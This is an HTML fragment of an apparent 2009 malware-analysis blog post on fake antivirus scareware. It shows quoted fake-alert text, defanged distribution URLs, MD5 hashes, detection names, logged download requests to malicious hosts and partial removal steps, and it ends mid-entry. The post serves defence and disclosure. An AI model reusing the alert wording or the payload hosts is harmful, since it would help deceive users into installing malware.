Trojan-IM.Win32.Faker.a"id="BLOGGER_PHOTO_ID_5316696090587735138" /></a><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sciy63GEd8I/AAAAAAAAALA/EpRjBFpVvOI/s1600-h/scan4lite.com-Fake.Trojan-IM.Win32.Faker.a.jpg"><br /> <br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 235px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sciy63GEd8I/AAAAAAAAALA/EpRjBFpVvOI/s320/scan4lite.com-Fake.Trojan-IM.Win32.Faker.a.jpg" border="0" alt="scan4lite.com Fake message: Trojan-IM.Win32.Faker.a"id="BLOGGER_PHOTO_ID_5316696084402436034" /></a><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s1600-h/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg"></a><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sci1TUKaQsI/AAAAAAAAALg/7e_gAT6ammE/s1600-h/scan4lite.com-scanner-virus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 64px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sci1TUKaQsI/AAAAAAAAALg/7e_gAT6ammE/s320/scan4lite.com-scanner-virus.jpg" border="0" alt="scan4lite.com Virus"id="BLOGGER_PHOTO_ID_5316698703545385666" /></a><br /><br /><u><b>Fake messages</b></u>:<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci0qhlo3CI/AAAAAAAAALY/Cy-EoZQJCTo/s1600-h/scan4lite.com-Fake.Message2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 265px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci0qhlo3CI/AAAAAAAAALY/Cy-EoZQJCTo/s320/scan4lite.com-Fake.Message2.jpg" border="0" alt="scan4lite.com Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5316698002774613026" /></a><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sci0p2lhGPI/AAAAAAAAALQ/NhfZPlRyOK4/s1600-h/scan4lite.com-Fake.Message.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 81px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sci0p2lhGPI/AAAAAAAAALQ/NhfZPlRyOK4/s320/scan4lite.com-Fake.Message.jpg" border="0" alt="scan4lite.com Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5316697991231379698" /></a><br /><br /><u><b>Fake Windows Security Alert</b></u>:<br /><br />Admess.Trojan<br />zserv.Transponder.Trojan<br />Wstart.TrojanDownloader<br />Email-Worm.Win32.Net<br />Email-Worm.Win32.Myd<br />Trojan-Downloader.Win <br /><br /></p><table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"><tr><td width="339" height="117"><i>Serious security and privacy threats found on your computer. <br /><br />It may damage your files or steal your personal and financial information.<br /><br />Click "OK" to start downloading CRITICAL security software update.</i></td></tr></table><p>Other template:<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScYG1T7kYmI/AAAAAAAAAKI/EN_lMv9QkwY/s1600-h/Fake.Admess.Trojan-protectionskim.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScYG1T7kYmI/AAAAAAAAAKI/EN_lMv9QkwY/s320/Fake.Admess.Trojan-protectionskim.com.jpg" border="0" alt="Fake Admess.Trojan - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943923110404706" /></a><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG1PBU1kI/AAAAAAAAAKA/5om4WC0g4qI/s1600-h/protectionskim.com.SystemSecurity-WinWebSecurity.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG1PBU1kI/AAAAAAAAAKA/5om4WC0g4qI/s320/protectionskim.com.SystemSecurity-WinWebSecurity.jpg" border="0" alt="Fake Scanner - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943921792374338" /></a><br /><br />Fake Scanner:<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScZCxX-PCOI/AAAAAAAAAKw/187fq9kgpAQ/s1600-h/wsc_vista.png"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScZCxX-PCOI/AAAAAAAAAKw/187fq9kgpAQ/s320/wsc_vista.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5316009826173520098" /></a><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScZCxFfuBjI/AAAAAAAAAKo/5r1YjdgewUM/s1600-h/wwwsecurityread.com.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScZCxFfuBjI/AAAAAAAAAKo/5r1YjdgewUM/s320/wwwsecurityread.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316009821213689394" /></a><br /><br /><u><b>Fake messages</b></u>:<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScYG1KCDgUI/AAAAAAAAAJ4/l3ssQsk5O3E/s1600-h/protectionskim.com.popup-2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 70px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScYG1KCDgUI/AAAAAAAAAJ4/l3ssQsk5O3E/s320/protectionskim.com.popup-2.jpg" border="0" alt="Fake Scanner - SystemSecurity message - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943920453255490" /></a> <a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG0hBCn6I/AAAAAAAAAJw/sB6iQCaGVHM/s1600-h/protectionskim.com.popup-1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 75px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG0hBCn6I/AAAAAAAAAJw/sB6iQCaGVHM/s320/protectionskim.com.popup-1.jpg" border="0" alt="Fake Scanner - SystemSecurity message - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943909443149730" /></a><br /><br /></p></td></tr><tr> <td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis of logscan6.com, mainscan6.com, logscan6.com:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://www.mainscan6.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://www.mainscan6.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="91"><b>File info</b>:</td><td colspan="2">install.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">40448 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">a63bd2a45057c5f589d8e75b429b02a8</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=a63bd2a45057c5f589d8e75b429b02a8" target="_blank">Report for InternetAntivirusPro - Rootkit.Win32.TDSS</a></td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=126455a5c13b94bd40161b4e4ab7bcfe9" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/fdcc854d9c312f91f37208be069599cc" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 06:42:43 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">5/39 (12.50%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td>Ikraus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Dldr.LooksLike.FraudLoad</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">VirTool:Win32/Obfuscator.DQ</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.Tdss.qxr (v) Other Scanner</span></td><td>Sunbelt</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ<br />(Sig-Id:380322)</span></td><td>Ikarus Virus Scanner</td><td> </td></tr></table><br /><table width="524" border="0" cellspacing="0" cellpadding="0"> <tr><td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr> <tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://logscan6.com/22/?uid=keyin</td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2">hxxp://logscan6.com/download/install.php</td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td><b>File info</b>:</td><td colspan="2">install.exe</td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td>File size</td><td colspan="2">40960 bytes</td><td> </td></tr> <tr><td> </td><td>MD5</td><td colspan="2">805d2e58e045471056b0bb7376b5b276</td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=100942b8d016a41448d08e9ef7388ee13" target="_blank">Anubis Report</a></td><td> </td></tr> <tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=805d2e58e045471056b0bb7376b5b276" target="_blank">ThreatExpert Report</a></td><td> </td></tr> <tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/68570a2aff70601662605b3d1ef6336f" target="_blank">VirusTotal Report</a></td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td>First received</td><td colspan="2">03.26.2009 22:50:25 (CET)</td><td> </td></tr> <tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr> <tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr> <tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Generic!Artemis</span></td><td>McAfee+Artemis</td><td> </td></tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Dldr.LooksLike.FraudLoad</span></td><td>McAfee-GW-Edition</td><td> </td></tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/InternetAntivirus</span></td><td>Microsoft</td><td> </td></tr></table><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr><tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://fuse4scan.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://fuse4scan.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td colspan="2">install.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">40960 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">bcfede07fc9834bab8c114af357bd559</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=182a3e881316140c491ace47e544c0665&call=first" target="_blank">Anubis Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/e0e793c3354a4df4169959478993c1b6" target="_blank">VirusTotal Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 02:34:00 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">5/40 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic!Artemis</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/InternetAntivirus</span></td><td>Microsoft</td><td> </td></tr></table><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr><tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://list4scan.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://list4scan.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td colspan="2"><span id="status_nombre">RegCureSetup_RW.exe</span></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">40960 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">529b7b5d0025995803ce374353ae197d</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=1fd048bdc0620bee40959271feba6f8ad" target="_blank">Anubis Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=529b7b5d0025995803ce374353ae197d" target="_blank">ThreatExpert Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/25c51c5b7878d5a05277701fd3772830" target="_blank">VirusTotal Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 23:31:23 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.38%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert.IK</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.LooksLike.PCK.Tdss</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">VirTool:Win32/Obfuscator.DQ</span></td><td>Microsoft</td><td> </td></tr></table><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr> <td width="20"></td> <td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td> <td width="18"></td></tr><tr><td> </td> <td width="91"> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Site URLs</b>:</td> <td colspan="2">hxxp://scan4fuse.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2">hxxp://scan4fuse.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://slot4scan.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://slot4scan.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td> <td colspan="2"><span id="status_nombre2">install.exe</span></td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td> <td colspan="2">41472 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td> <td colspan="2">705bc1d5c3467ce797eb62b92334279e</td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td> <td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=15f37007060936334998b4f177766f921" target="_blank">Anubis Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td> <td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=705bc1d5c3467ce797eb62b92334279e" target="_blank">ThreatExpert Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td> <td colspan="2"><a href="http://www.virustotal.com/analisis/4b38671291ca3810338f19cea9445c24" target="_blank">VirusTotal Report</a></td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td> <td colspan="2">03.28.2009 00:26:36 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td> <td colspan="2">7/39 (18.92%)</td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td> <td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td> <td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">HEUR/Crypted</span></td><td>Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert.IK</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.LooksLike.PCK.Tdss</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">VirTool:Win32/Obfuscator.DQ</span></td><td>Microsoft</td><td> </td></tr></table><br /><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr><tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://scan4open.com/22/?uid=keyin</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://scan4open.com/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td colspan="2"><span id="status_nombre3">install.exe</span></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">40960 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">2ecba36cd9af4a8c47b2f0423db7c8d6</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=1c6a602b79e8342b449fc3cb78a104c3d" target="_blank">Anubis Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=2ecba36cd9af4a8c47b2f0423db7c8d6" target="_blank">ThreatExpert Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/b0437b49932988544a9aa4f962c38256" target="_blank">VirusTotal Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.29.2009 04:29:12 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert.IK</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.LooksLike.PCK.Tdss</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">VirTool:Win32/Obfuscator.DQ</span></td><td>Microsoft</td><td> </td></tr></table><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr><tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://scan4plus.info/?uid=12404</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://scan4plus.info/download/install.php</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td colspan="2"><span id="status_nombre4">install.exe</span></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">40960 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">0471c7f12fa9074bd14a5a4b1393e670</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=10bffeb345340a99425f595791abc8ea2" target="_blank">Anubis Report</a> (Ikarus: Trojan.Win32.FakeSpyguard (Sig-Id:469235))</td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=0471c7f12fa9074bd14a5a4b1393e670" target="_blank">ThreatExpert Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/3737d83688b4ea45deceaf49a2c2baba" target="_blank">VirusTotal Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.29.2009 23:44:36 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">5/38 (13.13%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious file</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ</span></td><td> Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.LooksLike.PCK.Tdss</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">VirTool:Win32/Obfuscator.DQ</span></td><td>Microsoft</td><td> </td></tr></table><br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr><tr><td height="200"> </td><td><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci2Mi6U42I/AAAAAAAAALo/rRIZeZjXBc8/s1600-h/scan4any.bmp"><img style="cursor:pointer; cursor:hand;width: 320px; height: 60px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci2Mi6U42I/AAAAAAAAALo/rRIZeZjXBc8/s320/scan4any.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5316699686757000034" /></a><br /><br />HTTP Request: 66.197.154.198:80 - [in6ik.com] <br />Request: GET /download/InternetAntivirusPro.exe<br /> <br /> File size: 1939663 bytes<br /> MD5: d0e1c85deed607184fb5b3eb3fe5bf1a <br /> <br /><a href="http://www.threatexpert.com/report.aspx?md5=d0e1c85deed607184fb5b3eb3fe5bf1a">ThreatExpert</a><br /> <a href="http://www.virustotal.com/analisis/c75501f3a9dc7e72ce37bbf304822e1f">VirusTotal Report</a><br /><br />***************<br /><br />HTTP Request: 78.159.101.27:80 - [in4iz.com] <br /> Request: GET /download/InternetAntivirusPro.exe<br /> <br /> File size: 2160737 bytes<br />MD5: 1e1c910953bf69e6dc02e1ad956b99c9<br /><br />Only Sophos detect this new variant!<br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=1e1c910953bf69e6dc02e1ad956b99c9">ThreatExpert</a><br /><a href="http://www.virustotal.com/analisis/4157384a64180ab941a57a0f8f3d94bc">VirusTotal Report</a><br /><br />****************<br /><br />HTTP Request: 62.211.68.12:80 - [xoomer.virgilio.it] <br />Request: GET /tatatro/InternetAntivirusPro.exe <br /><br /> File size: 2160769 bytes<br />MD5: 4ca7119843d27c1bd3ad327b1dbb93cb<br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=4ca7119843d27c1bd3ad327b1dbb93cb">ThreatExpert</a><br /><a href="http://www.virustotal.com/analisis/4315641d55b1fc994bc82a2e86fcc521">VirusTotal Report</a><br /> <br /> <table width="524" border="0" cellspacing="0" cellpadding="0"><tr> <td width="20"></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td width="18"></td></tr><tr><td> </td><td width="91"> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">Trojan-Downloader.Win32.Renos.AQ!IK</span></td><td width="157">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Win32.MalFakeAV.m</span></td><td>eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert-AB</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert-AB</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Mal/FakeAV-M</span></td><td>Sophos</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Adware.IAPro.R.1939663</span></td><td>ViRobot</td><td> </td></tr></table><br /><br /><div style="border:solid 1px #0C0; width:520px; padding:10px">Some removal information can be found below<br /><br />- <u>Kill processes</u>: <b>*random file name*.exe</b>, <b>SystemSecurity.exe, av.exe, InternetAntivirusPro.exe</b><br /><br />- <u>Delete registry keys</u>:<br /><ul> <li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\<br />CurrentVersion\Uninstall\SystemSecurity2009 </li> <li>HKEY_LOCAL_MACHINE\SOFTWARE\ [random file.exe*]<br /> </li></ul>* random filename/random name: 8 digit like 00309781.exe<br /><br />- <u>Delete registry values</u>:<br /><ul> <li>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br /><br />{random key name *} = "" <br /><br />random file name * = "%CommonAppData%\*random filename*\*random filename*.exe"<br /><br /> </li> <li>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\<br />Uninstall\SystemSecurity2009]<br /><br />DisplayName = "System Security 2009" <br /><br />ShortcutPath = "%Programs%\System 